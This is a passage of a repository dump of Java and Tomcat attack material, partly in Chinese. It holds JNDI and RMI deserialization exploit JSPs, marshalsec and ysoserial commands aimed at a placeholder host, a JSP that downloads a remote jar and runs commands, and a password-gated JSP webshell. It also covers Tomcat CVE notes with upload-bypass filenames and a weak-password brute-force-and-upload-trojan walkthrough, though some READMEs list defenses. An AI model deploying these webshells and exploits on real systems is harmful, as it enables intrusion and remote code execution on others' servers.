execPath.setAccessible(true); 32 | execPath.set(o,cmd); 33 | o.run(); 34 | 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /shell/jndi/client.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*,javax.naming.*"%> 2 | <% 3 | System.setProperty(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory"); 4 | System.setProperty(Context.PROVIDER_URL,"rmi://127.0.0.1:1099"); 5 | Context ctx = new InitialContext(); 6 | Object obj = ctx.lookup("Exploit"); 7 | System.out.println(obj.toString()); 8 | %> 9 | -------------------------------------------------------------------------------- /shell/jndi/yso.txt: -------------------------------------------------------------------------------- 1 | java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip/#Exploit 2 | -------------------------------------------------------------------------------- /shell/jrmp/client.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*"%> 2 | <% 3 | String host = "127.0.0.1"; 4 | int port = 8855; 5 | 6 | ObjID id = new ObjID((new Random()).nextInt()); 7 | sun.rmi.transport.tcp.TCPEndpoint te = new sun.rmi.transport.tcp.TCPEndpoint(host, port); 8 | sun.rmi.server.UnicastRef ref = new sun.rmi.server.UnicastRef(new sun.rmi.transport.LiveRef(id, te, false)); 9 | RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); 10 | 11 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 12 | ObjectOutputStream outStream = new ObjectOutputStream(new BufferedOutputStream(byteArrayOutputStream)); 13 | outStream.writeObject(obj); 14 | outStream.flush(); 15 | outStream.close(); 16 | 17 | ObjectInputStream in = new ObjectInputStream(new BufferedInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()))); 18 | in.readObject(); 19 | %> 20 | -------------------------------------------------------------------------------- /shell/jrmp/exp.txt: -------------------------------------------------------------------------------- 1 | java8 -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip/#Exploit 2 | 3 | public class Exploit { 4 | public Exploit(){ 5 | try{ 6 | Runtime.getRuntime().exec("calc"); 7 | }catch(Exception e){ 8 | e.printStackTrace(); 9 | } 10 | } 11 | public static void main(String[] argv){ 12 | Exploit e = new Exploit(); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /shell/loadjar/Evil.java: -------------------------------------------------------------------------------- 1 | package com.company; 2 | import java.io.IOException; 3 | 4 | public class Evil { 5 | public void exec(String cmd) throws IOException { 6 | Runtime.getRuntime().exec(cmd); 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /shell/loadjar/server.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*"%> 2 | <% 3 | out.println(222222222); 4 | URL url = new URL("http://ip/Temp.jar"); 5 | URLClassLoader loader = new URLClassLoader (new URL[] {url}); 6 | Class cl = Class.forName ("com.company.Evil", true, loader); 7 | Object evil = cl.newInstance(); 8 | cl.getMethod("exec",String.class).invoke(evil,"calc"); 9 | %> 10 | -------------------------------------------------------------------------------- /shell/rmi-registry-bind/server.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*"%> 2 | <% 3 | class ServerImp extends UnicastRemoteObject { 4 | protected ServerImp() throws RemoteException { 5 | } 6 | 7 | } 8 | ServerImp server = new ServerImp(); 9 | int port = 1099; 10 | String registry_name = "rmi"; 11 | Registry registry = LocateRegistry.createRegistry(port); 12 | registry.bind(registry_name, server); 13 | System.out.println("Port:1099,Name:rmi,Service Start!n"); 14 | %> 15 | -------------------------------------------------------------------------------- /shell/rmi-registry-bind/yso.txt: -------------------------------------------------------------------------------- 1 | java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 1099 Jdk7u21 "calc" 2 | -------------------------------------------------------------------------------- /spring-bug/CVE-2016-4977.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/spring-bug/CVE-2016-4977.pdf -------------------------------------------------------------------------------- /spring-bug/CVE-2017-4971分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/spring-bug/CVE-2017-4971分析.pdf -------------------------------------------------------------------------------- /spring-bug/CVE-2017-8046分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/spring-bug/CVE-2017-8046分析.pdf -------------------------------------------------------------------------------- /spring-bug/CVE-2018-1270.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/spring-bug/CVE-2018-1270.pdf -------------------------------------------------------------------------------- /spring-bug/README.md: -------------------------------------------------------------------------------- 1 | # 分析介绍spring框架漏洞 2 | -------------------------------------------------------------------------------- /tomcat/CVE-2017-12615Tomcat远程代码执行漏洞/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-12615Tomcat远程代码执行漏洞 2 | 3 | **漏洞介绍** 4 | 5 | 远程代码执行漏洞(CVE-2017-12615) 影响:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法,攻击者通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行,危害十分严重 6 | 7 | **影响版本** 8 | 9 | `Apache Tomcat 7.0.0 - 7.0.81` 10 | 11 | **漏洞利用前提:** 12 | 13 | 需Tomcat开启了HTTP PUT请求 14 | 15 | 打开Tomcat安装目录的Tomcat7.0.x\conf\web.xml添加配置, 16 | 在Tomcat7.0版本下默认配置是开启readonly的,需要手动配置readonly为false才可以进行漏洞利用。 17 | ``` 18 | 19 | readonly 20 | false 21 | 22 | ``` 23 | 24 | **漏洞原理分析** 25 | 26 | Tomcat 的 Servlet 是在 conf/web.xml 配置的,通过配置文件可知,当后缀名为 .jsp 和 .jspx 的时候,是通过 JspServlet 处理请求的:而其他的静态文件是通过 DefaultServlet 处理的:可以得知,“1.jsp ”(末尾有一个和空格)并不能匹配到JspServlet,而是会交由 DefaultServlet 去处理。 27 | 当处理 PUT 请求时:会调用 resources.bind:dirContext 为 FileDirContext:调用 rebind 创建文件:又由于 Windows 不允许“ ”作为文件名结尾,所以会创建一个 .jsp 文件,导致代码执行。 28 | 29 | **该漏洞实际上是利用了window下文件名解析的漏洞来触发的**。通过构造特殊后缀名,绕过Tomcat检测,让Tomcat用DefaultServlet的逻辑处理请求,从而上传jsp webshell文件 30 | 有三种方法可以进行绕过 31 | 32 | ``` 33 | shell.jsp%20 34 | shell.jsp::$DATA 35 | shell.jsp/ 36 | ``` 37 | -------------------------------------------------------------------------------- /tomcat/CVE-2020-13942 Apache Unomi 远程代码执行漏洞/README.md: -------------------------------------------------------------------------------- 1 | ## CVE-2020-13942 Apache Unomi 远程代码执行漏洞 2 | 3 | **Apache Unomi简介** 4 | 5 | Apache Unomi 是一个基于标准的客户/数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。 6 | 7 | Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为: 8 | 9 | + Web CMS 个性化服务 10 | 11 | + 原生移动应用的分析服务 12 | 13 | + 具有分段功能的集中配置文件管理系统 14 | 15 | + 授权管理中心 16 | 17 | **漏洞描述** 18 | 19 | Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月 Unomi 成为Apache 软件基金会项目。在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为`CVE-2020-11975`,而`CVE-2020-13942`漏洞是对`CVE-2020-11975`漏洞的补丁绕过,攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码 20 | 21 | **漏洞影响版本** 22 | 23 | Apache Unomi < 1.5.2 24 | 25 | -------------------------------------------------------------------------------- /tomcat/CVE-2020-1938文件包含漏洞/README.md: -------------------------------------------------------------------------------- 1 | ## CVE-2020-1938文件包含漏洞 2 | 3 | **漏洞描述** 4 | 5 | 该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件,如:webapp配置文件或源代码等。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。 6 | 7 | **漏洞影响版本** 8 | 9 | ``` 10 | Apache Tomcat 6 11 | Apache Tomcat 7 < 7.0.100 12 | Apache Tomcat 8 < 8.5.51 13 | Apache Tomcat 9 < 9.0.31 14 | ``` 15 | 16 | **不受影响版本** 17 | 18 | ``` 19 | Apache Tomcat = 7.0.100 20 | Apache Tomcat = 8.5.51 21 | Apache Tomcat = 9.0.31 22 | ``` 23 | 24 | **漏洞分析** 25 | 26 | Tomcat在处理ajp协议时存在漏洞,可通过调用request.setAttribute为Tomcat设置任意request属性。复现发现Tomcat ajp协议存在web目录下任意文件读取漏洞以及JSP文件包含漏洞。 27 | 当ajp URI设置为非jsp路径时,Tomcat会调用DefaultServlet处理,此时会导致web目录任意文件读取漏洞。 28 | 29 | 当ajp URI设置为jsp路径时,Tomcat会调用JspServlet处理,此时会导致JSP文件包含漏洞 30 | 31 | 使用poc扫描目标网站 32 | 33 | ``` 34 | 下载地址: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 35 | ``` 36 | 37 | **防御方式** 38 | 39 | 1.禁用AJP协议,在tomcat安装路径中找到/conf/server.xml文件,删除或注释下面这行代码:`` 40 | 2.升级到tomcat最新版本 41 | 3.配置secret来设置AJP协议的认证凭证,如: 42 | 43 | ```xml 44 | 45 | ``` 46 | 47 | ## 48 | -------------------------------------------------------------------------------- /tomcat/README.md: -------------------------------------------------------------------------------- 1 | # 关于tomcat的历史漏洞分析 2 | 3 | Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的 4 | 5 | ![](./img/1.png) 6 | -------------------------------------------------------------------------------- /tomcat/Tomcat后台弱口令漏洞/README.md: -------------------------------------------------------------------------------- 1 | # Tomcat后台弱口令漏洞 2 | 3 | Tomcat后台存在弱口令,进入网站后点击登录然后使用burp进行爆破测试 4 | 5 | 可以发现账户密码是利用Authorization该授权字段以base64方式传递账户信息的 6 | 发现加密方式后,拿去解密后发现他的数据传输是将账户与密码用冒号进行组合之后在用base64加密所传递的。构造字段进行爆破 7 | 使用burp抓包后发送到 Intrude 模块进行暴力破解 8 | 9 | 成功爆破出账号密码,然后使用base64解码得出明文账号密码 10 | 使用爆破出的账号密码登录进去后台后发现有一个上传页面,直接上传一个war木马就可以 11 | 12 | 可以使用python进行暴力破解或者是bp 13 | 这里可以使用kali的msf模块 14 | 15 | ``` 16 | use auxiliary/scanner/http/tomcat_mgr_login 17 | set rhosts ip 18 | set rport port 19 | ``` 20 | -------------------------------------------------------------------------------- /tomcat/Tomcat后台弱口令漏洞/shell.jsp: -------------------------------------------------------------------------------- 1 | <% 2 | // shell.jsp?pwn=Firebasky&cmd=whoami 3 | if("Firebasky".equals(request.getParameter("pwd"))){ 4 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 5 | int a = -1; 6 | byte[] b = new byte[2048]; 7 | out.print("
");
 8 |     while((a=in.read(b))!=-1){
 9 |         out.println(new String(b));
10 |     }
11 |     out.print("
"); 12 | } 13 | //jar cvf shell.war .\shell.jsp 14 | %> 15 | -------------------------------------------------------------------------------- /tomcat/Tomcat后台弱口令漏洞/shell.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/tomcat/Tomcat后台弱口令漏洞/shell.war -------------------------------------------------------------------------------- /tomcat/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/tomcat/img/1.png -------------------------------------------------------------------------------- /tomcat/img/README.md: -------------------------------------------------------------------------------- 1 | ## 照片 2 | --------------------------------------------------------------------------------